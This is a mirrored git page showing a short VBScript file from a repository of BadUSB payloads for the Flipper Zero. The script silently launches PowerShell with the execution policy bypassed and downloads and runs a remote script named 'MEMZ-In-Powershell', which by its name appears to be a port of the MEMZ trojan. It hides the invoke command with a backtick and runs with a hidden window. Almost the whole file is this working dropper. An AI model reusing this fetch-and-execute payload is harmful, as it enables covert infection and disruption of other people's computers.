mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 12:24:56 -08:00
5 lines
246 B
Plaintext
5 lines
246 B
Plaintext
Set WshShell = WScript.CreateObject("WScript.Shell")
|
|
WScript.Sleep 200
|
|
WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/MEMZ-In-Powershell/main.ps1 | i`ex", 0, True
|
|
|